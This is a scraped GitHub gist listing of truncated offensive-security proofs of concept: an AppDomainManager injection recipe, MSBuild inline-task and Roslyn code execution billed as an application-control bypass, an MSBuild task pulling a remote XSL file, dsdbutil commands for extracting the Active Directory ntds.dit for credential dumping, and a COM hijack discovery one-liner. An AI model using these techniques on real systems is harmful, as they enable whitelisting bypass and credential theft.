Skip to content

Instantly share code, notes, and snippets.

@bohops
bohops / SimpleExportExampleDll.cpp
Last active Jun 12, 2020
Simple Export Dll Example
View SimpleExportExampleDll.cpp
#include "pch.h"
#define EXPORT extern "C" __declspec(dllexport)
EXPORT void HelloWorld()
{
MessageBox(0, L"Hello World!", 0, 0);
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
@bohops
bohops / _Instructions_Reproduce.md
Created Apr 30, 2020
GhostLoader - AppDomainManager - Injection - 攻壳机动队
View _Instructions_Reproduce.md

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
View simple_msbuild.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<UsingTask TaskName="HelloWorld" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine(":-) CSHARP :-)");]]>
</Code>
</Task>
</UsingTask>
<Target Name="Build">
<HelloWorld />
@bohops
bohops / dsdbutil.exe
Last active Mar 29, 2020
yet another native AD database extraction utility
View dsdbutil.exe
DSDButil
========
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
View msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
@bohops
bohops / poc.png
Created May 22, 2019
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View dotnetcore_msbuild_rosylyn_poc.csproj
<!-- dotnet.exe msbuild rosylyn_poc.csproj -->
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Rosyln Compiler -->
<Project DefaultTargets="Build">
<UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
<Task>
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine($":-) CSHARP :-)");]]>
</Code>
</Task>
</UsingTask>
View gethelp.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@bohops
bohops / WSH_approved_list.txt
Created Mar 13, 2019 — forked from mattifestation/WSH_approved_list.txt
WldpIsClassInApprovedList approved classID for WLDP_HOST_ID_WSH hosts (which includes COM scriptlets)
View WSH_approved_list.txt
041e868e-0c7d-48c6-965f-5fd576530e5b
0438c02b-eb9c-4e42-81ad-407f6cd6cde1
078b1f7d-c34c-4b13-a7c3-9663901650f1
0abb2961-2cc1-4f1d-be8e-9d330d06b77d
0d7237e6-930f-4682-ad0a-52ebffd3aee3
0d972387-817b-46e7-913f-e9993ff401eb
0e770b12-7221-4a5d-86ee-77310a5506bb
0fa57208-5100-4cd6-955c-fe69f8898973
1080a020-2b47-4da9-8095-dbc9cefffc04
10cf2e12-1681-4c53-adc0-932c84832cd8
View Abandoned_COM_PowerShell.txt
- Abandoned COM Discovery Script.
- Makes a few assumptions, needs refinement (e.g. doesn't account for all extensions)
function GetMissing($server){$clsids=@{};cd $env:windir'\system32\';$srv=gwmi Win32_COMSetting | ?{$_.$server -ne $null};$srv | ForEach {$clsids.add($_.ComponentId,$_.$server)};$clsids.Keys | foreach {$p=[Environment]::ExpandEnvironmentVariables($clsids[$_]);$p=$p.Replace('"','');if($p.Contains('.exe ')){$p=$p.Substring(0,$p.IndexOf('.exe'))+'.exe'};if($(test-path $p) -eq $False){$_+' | '+$server+' | '+$p}}};GetMissing('LocalServer');GetMissing('LocalServer32');GetMissing('InprocServer');GetMissing('InprocServer32')
You can’t perform that action at this time.